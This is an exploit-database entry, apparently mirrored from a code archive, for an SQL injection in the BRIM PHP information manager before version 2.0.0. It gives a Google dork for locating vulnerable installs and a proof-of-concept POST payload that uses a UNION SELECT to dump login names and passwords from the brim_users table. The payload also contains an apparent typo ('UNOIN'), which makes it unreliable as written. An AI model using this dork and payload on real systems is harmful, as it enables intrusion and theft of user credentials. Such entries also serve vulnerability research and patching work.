Skip to content
cyberexploits
webappphptext

Brim < 2.0.0 - SQL Injection

Brim < 2.0.0 - SQL Injection

Publié le 2012-02-22

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/18506.txt7eac4c3a
raw
BRIM < 2.0.0 SQL InjectionExploit information



   - Exploit Title: BRIM < 2.0.0 SQL Injection

   - Google Dork: "Brim project" intitle:"Brim - login"

   - Date: 2012-02-20

   - Author: ifnull

   - Tested on: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 � although it should

   work on any environment. Example uses MySQL 5 query escape but can easily

   be ported to prior versions of MySQL.

   - Description: Unlike CVE-2008-4082, this will work with or without

   magic_quotes_gpc enabled. Like the last exploit however, you must first

   create an account and enable "tasks". By default anyone can create an

   account and the accounts are automatically approved.



Software information



   - Version: < 2.0.0

   - Link: http://sourceforge.net/projects/brim/

   - Description: BRIM is a MVC framework, written in PHP and based on

   items with a hierarchical relationship. The list of plugins make BRIM a

   Information Manager with plugins like bookmarks, a calendar, contacts

   tasks, notes, RSS etc. The application is multilingual.



Proof of ConceptPOST



URI: /index.php

Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks





Voir sur GitHub